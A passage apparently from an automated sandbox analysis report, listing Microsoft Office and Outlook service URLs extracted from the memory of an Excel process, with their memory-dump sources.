https://outlook.office365.com/autodiscover/autodiscover.json
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonJ
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook~V
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxAwsCgQueryhttps://
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxZ
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxu
    Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonC
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13pW
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.netPowerLiftGymBaseUrlhttps://powerlift.acompli.netSubstrateOffi
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://powerlift.acompli.net
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://powerlift.acompli.netU
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://roaming.edog.
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://settings.outlook.com
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comS
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerBIGetDatasetsApihttps://api.pow
    Source: EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://staging.cortana.ai
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aiBearer
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpString found in binary or memory: https://storage.live.com/clientlogs/uploadlocationicc
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryMBI_SSL
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryuR
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/initMBI_SSL
